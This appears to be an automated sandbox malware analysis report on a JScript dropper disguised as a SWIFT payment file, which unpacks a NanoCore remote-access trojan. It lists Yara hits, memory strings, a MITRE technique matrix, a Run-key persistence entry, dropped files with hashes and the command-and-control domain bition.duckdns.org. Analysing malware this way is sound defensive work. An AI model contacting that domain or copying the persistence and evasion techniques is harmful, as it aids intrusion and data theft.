      Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exeCode function: 2_2_0040758B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0040758B
      Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
      Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: fdqkbs.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: fdqkbs.exe, 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: fdqkbs.exe, 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: fdqkbs.exe, 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: fdqkbs.exe, 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: fdqkbs.exe, 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: fdqkbs.exe, 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: fdqkbs.exe, 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: fdqkbs.exe, 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: Yara matchFile source: 3.2.fdqkbs.exe.417058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.417058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.2480000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.34e5530.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.35631e4.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.356780d.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.4910000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.2480000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.6240e0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.35631e4.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.6240e0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.34e5530.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts13
      Scripting
      1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      1
      Disable or Modify Tools
      21
      Input Capture
      1
      System Time Discovery
      Remote Services11
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts12
      Native API
      Boot or Logon Initialization Scripts111
      Process Injection
      11
      Deobfuscate/Decode Files or Information
      LSASS Memory2
      File and Directory Discovery
      Remote Desktop Protocol21
      Input Capture
      Exfiltration Over Bluetooth1
      Data Encoding
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Exploitation for Client Execution
      Logon Script (Windows)1
      Registry Run Keys / Startup Folder
      13
      Scripting
      Security Account Manager26
      System Information Discovery
      SMB/Windows Admin Shares1
      Clipboard Data
      Automated Exfiltration1
      Remote Access Software
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts2
      Command and Scripting Interpreter
      Logon Script (Mac)Logon Script (Mac)3
      Obfuscated Files or Information
      NTDS41
      Security Software Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer1
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
      Software Packing
      LSA Secrets31
      Virtualization/Sandbox Evasion
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Masquerading
      Cached Domain Credentials1
      Remote System Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items31
      Virtualization/Sandbox Evasion
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Access Token Manipulation
      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)111
      Process Injection
      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
      Hidden Files and Directories
      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 796930 Sample: SWIFT MO104978172_1301 EURO... Startdate: 02/02/2023 Architecture: WINDOWS Score: 100 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 7 other signatures 2->59 10 wscript.exe 2 2->10         started        14 syhbwgs.exe 2->14         started        16 syhbwgs.exe 2->16         started        process3 file4 45 C:\...\SWIFT MO104978172_1301 EURO 9700.exe, PE32 10->45 dropped 67 Benign windows process drops PE files 10->67 69 JScript performs obfuscated calls to suspicious functions 10->69 18 SWIFT MO104978172_1301 EURO 9700.exe 19 10->18         started        21 WerFault.exe 10 14->21         started        23 WerFault.exe 10 16->23         started        signatures5 process6 file7 39 C:\Users\user\AppData\Local\Temp\fdqkbs.exe, PE32 18->39 dropped 25 fdqkbs.exe 1 2 18->25         started        process8 file9 43 C:\Users\user\AppData\Roaming\...\syhbwgs.exe, PE32 25->43 dropped 61 Detected unpacking (creates a PE file in dynamic memory) 25->61 63 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 25->63 65 Maps a DLL or memory area into another process 25->65 29 fdqkbs.exe 6 25->29         started        signatures10 process11 dnsIp12 51 192.168.2.1 unknown unknown 29->51 47 C:\Users\user\AppData\Roaming\...\run.dat, International 29->47 dropped 49 C:\Users\user\AppData\...\fdqkbs.exe.log, ASCII 29->49 dropped 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->71 34 fdqkbs.exe 29->34         started        file13 signatures14 process15 process16 36 WerFault.exe 23 9 34->36         started        file17 41 C:\ProgramData\Microsoft\...\Report.wer, Unicode 36->41 dropped

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      SWIFT MO104978172_1301 EURO 9700.js46%ReversingLabsScript-JS.Downloader.Nemucod
      SWIFT MO104978172_1301 EURO 9700.js100%AviraJS/Dropper.G1
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLinkDownload
      3.2.fdqkbs.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      0.3.wscript.exe.2c17141e8b0.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      2.2.fdqkbs.exe.21d0000.1.unpack100%AviraHEUR/AGEN.1230506Download File
      3.2.fdqkbs.exe.4910000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      0.2.wscript.exe.2c1743a0090.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      1.2.SWIFT MO104978172_1301 EURO 9700.exe.287bc2f.1.unpack100%AviraHEUR/AGEN.1230498Download File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      bition.duckdns.org100%Avira URL Cloudmalware
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      bition.duckdns.orgtrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://upx.sf.netAmcache.hve.12.drfalse
        high
        http://nsis.sf.net/NSIS_ErrorErrorwscript.exe, 00000000.00000003.255882496.000002C17141E000.00000004.00000020.00020000.00000000.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000000.255759037.000000000040A000.00000008.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe.0.drfalse
          high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefdqkbs.exe, 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            IP
            192.168.2.1
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:796930
            Start date and time:2023-02-02 12:36:13 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 11m 19s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:26
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • GSI enabled (Javascript)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample file name:SWIFT MO104978172_1301 EURO 9700.js
            Detection:MAL
            Classification:mal100.troj.evad.winJS@13/22@0/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 93.2% (good quality ratio 89%)
            • Quality average: 84.9%
            • Quality standard deviation: 25.6%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 96
            • Number of non-executed functions: 72
            Cookbook Comments:
            • Found application associated with file extension: .js
            • Override analysis time to 240s for JS/VBS files not yet terminated
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 104.208.16.94
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: SWIFT MO104978172_1301 EURO 9700.js
            TimeTypeDescription
            12:37:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run aofpiisomve C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
            12:37:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run aofpiisomve C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
            12:37:32API Interceptor3x Sleep call for process: WerFault.exe modified
            No context
            No context
            No context
            No context
            No context
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):65536
            Entropy (8bit):0.9124277615016035
            Encrypted:false
            SSDEEP:96:5zF6yLCQcA0EhjO72TNFpXIQcQ7Bc677MecEwcw3OaAK+HbHgA5JHQ0DFF/+xnjn:9AjArHFBf7naWTjkRy8/u7sfS274ItP
            MD5:54EB02F0418F018F55EA3A32CFCF0B06
            SHA1:6E21B2559196D7D3610EB270FAACD641F78E84CA
            SHA-256:804EED930B42ED7C70EF962F42F809CB1C803442CE968DE98568AC799CF6B715
            SHA-512:7AC568EB696025D26480940518E425F75F165B4A50857AB4CA598FD8A9550A082E41A0EA6A8CECE5F6BB1F735D36DCC6673EC79C1B6E1332D45A4CFD138C4B0F
            Malicious:true
            Reputation:low
            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.0.1.1.5.3.3.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.1.0.6.8.4.4.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.c.6.1.a.7.4.-.f.c.7.4.-.4.1.b.1.-.a.4.a.3.-.3.b.5.5.1.4.7.5.a.2.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.6.b.2.a.c.8.-.e.a.f.e.-.4.2.1.b.-.8.7.d.3.-.9.f.1.5.c.d.6.1.e.0.0.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.d.q.k.b.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.c.4.-.0.0.0.1.-.0.0.1.a.-.f.a.1.7.-.f.5.2.7.4.6.3.7.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.d.a.e.3.3.6.9.7.1.6.8.4.3.4.7.7.c.e.9.2.6.4.1.e.a.3.5.e.e.e.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.9.e.d.e.2.2.e.2.e.4.7.e.1.5.a.e.b.4.1.c.1.d.b.a.8.b.0.c.d.1.a.6.6.9.2.6.9.3.b.!.f.d.q.k.b.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.1./.
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):65536
            Entropy (8bit):0.9241144707591883
            Encrypted:false
            SSDEEP:96:sBJFnfaN3CQcAYWhjM72TNFpXIQcQ/c6RcExcw3LzByBL+HbHg/LAeugtYsaGFY7:sfl1AfHxVr1cojoCIt/u7sfS274Itpk
            MD5:80BB8753216DCBE60D8E9622CD1557EB
            SHA1:0F17E4B0DDE8DDE185259FB2616650C53034FFE6
            SHA-256:68311BD22EB276D7727FD748777FA6130A27E45162248F425F0ABFD5F7D4952D
            SHA-512:21ED1EA82739691758C8C0EB83FD25FC91E19248CE0109BBA4C16AC9EEC425C0C8C4566BCF98D116F59EE791E257F11917270E9AF69C9F4340C0758E122B457A
            Malicious:false
            Reputation:low
            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.0.8.3.8.7.7.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.8.4.3.8.5.1.6.5.1.2.9.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.1.c.b.4.0.d.-.1.5.a.a.-.4.e.9.d.-.9.3.b.6.-.9.a.3.3.f.3.9.3.2.7.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.c.8.f.e.d.d.-.e.0.7.7.-.4.7.a.0.-.b.b.4.f.-.a.1.d.1.2.c.d.d.a.3.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.y.h.b.w.g.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.4.-.0.0.0.1.-.0.0.1.a.-.5.6.3.b.-.0.1.2.a.4.6.3.7.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.d.0.6.7.e.8.a.d.2.9.5.c.5.a.d.c.3.a.f.3.9.e.1.3.3.a.c.b.6.f.1.0.0.0.0.f.f.f.f.!.0.0.0.0.5.9.e.d.e.2.2.e.2.e.4.7.e.1.5.a.e.b.4.1.c.1.d.b.a.8.b.0.c.d.1.a.6.6.9.2.6.9.3.b.!.s.y.h.b.w.g.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):65536
            Entropy (8bit):0.9172870075716885
            Encrypted:false
            SSDEEP:96:1aF2WFGCQcAIWhjM72TNFpXIQcQ/c6RcExcw3LzByBL+HbHgA5JHQ0DFF/+xnj+v:0IE9APHxVr1coji3y8/u7sfS274Itpk
            MD5:F3098F195CE2FBB700837CB39D8E5D5A
            SHA1:13D1E37D4113612FBF3AA8FCEAB15512E562A5EE
            SHA-256:1016BF1F702A0D5C118CF6CB17110518ACE3D02B9D431D95A109B7B3DE1EE2D2
            SHA-512:7DAFB6E6F0F15FDC10152669F158DC461EDA0879F51577311F124881DDC8C24E97CF50B7A05A05548D95A8C8B86081FE1AF03261AC705ABDD81B8BBAA171B3A7
            Malicious:false
            Reputation:low
